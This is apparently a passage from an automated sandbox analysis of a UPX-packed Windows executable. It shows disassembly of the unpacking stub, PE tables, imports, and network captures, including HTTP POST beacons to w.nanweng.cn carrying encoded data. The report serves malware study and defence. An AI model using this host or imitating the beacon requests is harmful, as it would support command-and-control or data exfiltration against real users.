                                                                                                                                                                                                        mov al, byte ptr [esi]
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        mov byte ptr [edi], al
                                                                                                                                                                                                        inc edi
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        jc 00007F3BA905DBAFh
                                                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        adc eax, eax
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jnc 00007F3BA905DBCDh
                                                                                                                                                                                                        jne 00007F3BA905DBEAh
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        jc 00007F3BA905DBE1h
                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        adc eax, eax
                                                                                                                                                                                                        jmp 00007F3BA905DB96h
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        adc ecx, ecx
                                                                                                                                                                                                        jmp 00007F3BA905DC14h
                                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                                        sub eax, 03h
                                                                                                                                                                                                        jc 00007F3BA905DBD3h
                                                                                                                                                                                                        shl eax, 08h
                                                                                                                                                                                                        mov al, byte ptr [esi]
                                                                                                                                                                                                        inc esi
                                                                                                                                                                                                        xor eax, FFFFFFFFh
                                                                                                                                                                                                        je 00007F3BA905DC37h
                                                                                                                                                                                                        sar eax, 1
                                                                                                                                                                                                        mov ebp, eax
                                                                                                                                                                                                        jmp 00007F3BA905DBCDh
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        jc 00007F3BA905DB8Eh
                                                                                                                                                                                                        inc ecx
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        jc 00007F3BA905DB80h
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jne 00007F3BA905DBC9h
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        adc ecx, ecx
                                                                                                                                                                                                        add ebx, ebx
                                                                                                                                                                                                        jnc 00007F3BA905DBB1h
                                                                                                                                                                                                        jne 00007F3BA905DBCBh
                                                                                                                                                                                                        mov ebx, dword ptr [esi]
                                                                                                                                                                                                        sub esi, FFFFFFFCh
                                                                                                                                                                                                        adc ebx, ebx
                                                                                                                                                                                                        jnc 00007F3BA905DBA6h
                                                                                                                                                                                                        add ecx, 02h
                                                                                                                                                                                                        cmp ebp, 00000000h
                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                        • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1aaec0 | 0x254 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a5000 | 0x5ec0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xa0bd0 | 0x25d0 | UPX0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x1a4e04 | 0x18 | UPX1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1a4e24 | 0xa0 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x10c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x10d000 | 0x98000 | 0x98000 | d455e43d2378437ade2a0574470fdf68 | False | 0.9907210500616777 | data | 7.930810462244519 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1a5000 | 0x7000 | 0x6200 | 49f3b9cff56d5ea4ae00baa0359b3c86 | False | 0.18339445153061223 | data | 3.9768053975413475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
ZIP | 0x19ed40 | 0x2f87 | data | Chinese | China | 0.9866031067641983
RT_ICON | 0x1a5304 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Chinese | China | 0.21321961620469082
RT_ICON | 0x1a61b0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Chinese | China | 0.3953068592057762
RT_ICON | 0x1a6a5c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Chinese | China | 0.4479768786127168
RT_ICON | 0x1a6fc8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Chinese | China | 0.09948132780082987
RT_ICON | 0x1a9574 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Chinese | China | 0.12593808630393996
RT_ICON | 0x1aa620 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Chinese | China | 0.19680851063829788
RT_MENU | 0x19ead0 | 0x24 | data | Chinese | China | 1.25
RT_DIALOG | 0x1a1cc8 | 0x18 | data | Chinese | China | 1.375
RT_GROUP_ICON | 0x1aaa8c | 0x5a | data | Chinese | China | 0.7
RT_VERSION | 0x1aaaec | 0x248 | data | Chinese | China | 0.511986301369863
RT_MANIFEST | 0x1aad38 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
ADVAPI32.dll | RegCloseKey
COMCTL32.dll |
GDI32.dll | PatBlt
gdiplus.dll | GdipFree
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
MSIMG32.dll | AlphaBlend
ole32.dll | OleCreate
OLEAUT32.dll | VariantClear
USER32.dll | GetDC
WLDAP32.dll |
WS2_32.dll | setsockopt
Language of compilation system | Country where language is spoken
Chinese | China
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901315928 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901463032 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901530981 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901602030 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901644945 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901652098 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901695967 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.901701927 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.902091026 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.902268887 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.902370930 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907668114 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907728910 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907747984 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907793045 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907800913 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907843113 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907881021 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907886982 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907937050 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907947063 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907953024 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907974005 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.907987118 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908709049 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908761024 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908766985 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908780098 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908818007 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908839941 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.908904076 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.915332079 CET4434972518.244.18.122192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.958895922 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.958961964 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.958962917 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.958995104 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.959038973 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.987807989 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.987899065 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.987941027 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.987947941 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.987972975 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988010883 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988019943 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988060951 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988544941 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988601923 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988606930 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.988643885 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990544081 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990573883 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990622044 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990622997 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990655899 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990655899 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990677118 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990685940 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.990715027 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995105982 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995166063 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995197058 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995202065 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995253086 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995253086 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995357037 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995402098 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995434046 CET49727443192.168.2.5151.101.194.137
                                                                                                                                                                                                        Jan 3, 2025 15:26:00.995445967 CET44349727151.101.194.137192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132700920 CET4434972518.244.18.122192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132777929 CET4434972518.244.18.122192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132777929 CET49725443192.168.2.518.244.18.122
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132816076 CET49725443192.168.2.518.244.18.122
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132905960 CET49725443192.168.2.518.244.18.122
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132917881 CET4434972518.244.18.122192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132940054 CET49725443192.168.2.518.244.18.122
                                                                                                                                                                                                        Jan 3, 2025 15:26:01.132958889 CET49725443192.168.2.518.244.18.122
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.108386993 CET4970780192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.108499050 CET4970880192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.219198942 CET4974380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.219410896 CET4974480192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224144936 CET804974347.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224214077 CET4974380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224229097 CET804974447.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224286079 CET4974480192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224415064 CET4974380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224431038 CET4974380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224539995 CET4974480192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.224558115 CET4974480192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.229202986 CET804974347.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.229312897 CET804974347.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.229325056 CET804974447.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:06.229336023 CET804974447.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.108695984 CET4974380192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.108742952 CET4974480192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.625189066 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.625245094 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630196095 CET804978547.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630211115 CET804978647.103.45.17192.168.2.5
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630315065 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630502939 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630502939 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630520105 CET4978680192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630525112 CET4978580192.168.2.547.103.45.17
                                                                                                                                                                                                        Jan 3, 2025 15:26:18.630568981 CET4978580192.168.2.547.103.45.17
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 3, 2025 15:25:54.239998102 CET | 192.168.2.5 | 1.1.1.1 | 0xec95 | Standard query (0) | w.nanweng.cn | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:25:55.308867931 CET | 192.168.2.5 | 1.1.1.1 | 0xfd05 | Standard query (0) | www.msn.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:25:57.210992098 CET | 192.168.2.5 | 1.1.1.1 | 0x36d2 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.135993958 CET | 192.168.2.5 | 1.1.1.1 | 0x9a78 | Standard query (0) | c.msn.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.137765884 CET | 192.168.2.5 | 1.1.1.1 | 0xf1a1 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.213023901 CET | 192.168.2.5 | 1.1.1.1 | 0x4679 | Standard query (0) | code.jquery.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.352000952 CET | 192.168.2.5 | 1.1.1.1 | 0xfba8 | Standard query (0) | browser.events.data.msn.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:04.352897882 CET | 192.168.2.5 | 1.1.1.1 | 0x9464 | Standard query (0) | login.microsoftonline.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:06.454942942 CET | 192.168.2.5 | 1.1.1.1 | 0xf37a | Standard query (0) | 2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:06.500089884 CET | 192.168.2.5 | 1.1.1.1 | 0xff9d | Standard query (0) | 45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:08.507715940 CET | 192.168.2.5 | 1.1.1.1 | 0x2218 | Standard query (0) | 238358d141a1b2850f10e9a50017a441.clo.footprintdns.com | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:58.479439974 CET | 192.168.2.5 | 1.1.1.1 | 0xc861 | Standard query (0) | w.nanweng.cn | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 3, 2025 15:25:54.640136957 CET | 1.1.1.1 | 192.168.2.5 | 0xec95 | No error (0) | w.nanweng.cn | | 47.103.45.17 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:25:55.315571070 CET | 1.1.1.1 | 192.168.2.5 | 0xfd05 | No error (0) | www.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:25:57.217885971 CET | 1.1.1.1 | 192.168.2.5 | 0x36d2 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:00.142545938 CET | 1.1.1.1 | 192.168.2.5 | 0x9a78 | No error (0) | c.msn.com | c-msn-com-nsatc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:00.145703077 CET | 1.1.1.1 | 192.168.2.5 | 0xf1a1 | No error (0) | sb.scorecardresearch.com | | 18.244.18.122 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.145703077 CET | 1.1.1.1 | 192.168.2.5 | 0xf1a1 | No error (0) | sb.scorecardresearch.com | | 18.244.18.38 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.145703077 CET | 1.1.1.1 | 192.168.2.5 | 0xf1a1 | No error (0) | sb.scorecardresearch.com | | 18.244.18.27 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.145703077 CET | 1.1.1.1 | 192.168.2.5 | 0xf1a1 | No error (0) | sb.scorecardresearch.com | | 18.244.18.32 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.219693899 CET | 1.1.1.1 | 192.168.2.5 | 0x4679 | No error (0) | code.jquery.com | | 151.101.194.137 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.219693899 CET | 1.1.1.1 | 192.168.2.5 | 0x4679 | No error (0) | code.jquery.com | | 151.101.130.137 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.219693899 CET | 1.1.1.1 | 192.168.2.5 | 0x4679 | No error (0) | code.jquery.com | | 151.101.2.137 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.219693899 CET | 1.1.1.1 | 192.168.2.5 | 0x4679 | No error (0) | code.jquery.com | | 151.101.66.137 | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:00.359489918 CET | 1.1.1.1 | 192.168.2.5 | 0xfba8 | No error (0) | browser.events.data.msn.com | global.asimov.events.data.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:04.359673977 CET | 1.1.1.1 | 192.168.2.5 | 0x9464 | No error (0) | login.microsoftonline.com | login.mso.msidentity.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:06.496112108 CET | 1.1.1.1 | 192.168.2.5 | 0xf37a | Name error (3) | 2f928570784a0da6dbd199b018c9f49c.clo.footprintdns.com | none | none | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:06.548281908 CET | 1.1.1.1 | 192.168.2.5 | 0xff9d | No error (0) | 45295f866ecde2b90fe5d09c77f95c80.clo.footprintdns.com | ma1prdapp01-canary.netmon.azure.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:06.548281908 CET | 1.1.1.1 | 192.168.2.5 | 0xff9d | No error (0) | ma1prdapp01-canary.netmon.azure.com | ma1prdapp01-canary.southindia.cloudapp.azure.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:08.550780058 CET | 1.1.1.1 | 192.168.2.5 | 0x2218 | Name error (3) | 238358d141a1b2850f10e9a50017a441.clo.footprintdns.com | none | none | A (IP address) | IN (0x0001) | false
Jan 3, 2025 15:26:10.588109970 CET | 1.1.1.1 | 192.168.2.5 | 0xc8f1 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 3, 2025 15:26:59.419344902 CET | 1.1.1.1 | 192.168.2.5 | 0xc861 | No error (0) | w.nanweng.cn | | 47.103.45.17 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                        • https:
                                                                                                                                                                                                          • code.jquery.com
                                                                                                                                                                                                          • sb.scorecardresearch.com
                                                                                                                                                                                                        • w.nanweng.cn
                                                                                                                                                                                                        • w.nanweng.cn
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:25:54.648322105 CET | 223 | OUT | POST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:25:54.648488045 CET | 13 | OUT | Data Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:25:54.648333073 CET | 223 | OUT | POST /qy/gl HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:25:54.648375034 CET | 331 | OUT | Data Raw: 6a 73 3d 44 68 49 68 41 77 67 6a 4b 52 73 78 4b 43 4a 64 4a 6a 67 63 41 6a 49 7a 4d 52 45 69 41 51 51 63 4a 79 67 68 41 6a 45 73 49 67 49 6b 41 53 6f 59 49 67 59 48 41 43 49 42 42 42 49 6d 4c 7a 35 59 4a 79 67 68 48 7a 45 76 50 67 49 6b 41 69 49
                                                                                                                                                                                                        Data Ascii: js=DhIhAwgjKRsxKCJdJjgcAjIzMREiAQQcJyghAjEsIgIkASoYIgYHACIBBBImLz5YJyghHzEvPgIkAiIRJj8_WyQ-ABMlWSUAMhExByZZMl4xLzocMj86XzE8LlokPwBfJS8AETECIhgiBSUbMSgiXSYRMhwnKCERDygiXSYoHAIPPAcAIgEEAiY-KhIxPy5bJD8pBiYvMhwlLCYcJREDBiUBCFoyWTJeJC8AXjIGJlkxPzIC


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49743 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 15:26:06.224415064 CET | 223 | OUT | POST /qy/png HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; WOW64; Trident/5.0)
                                                                                                                                                                                                        Content-Length: 13
                                                                                                                                                                                                        Host: w.nanweng.cn
Jan 3, 2025 15:26:06.224431038 CET | 13 | OUT | Data Raw: 6a 73 3d 7b 22 70 6e 67 22 3a 31 7d 0a
                                                                                                                                                                                                        Data Ascii: js={"png":1}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49744 | 47.103.45.17 | 80 | 768 | C:\Users\user\Desktop\nv8401986_110422.exe
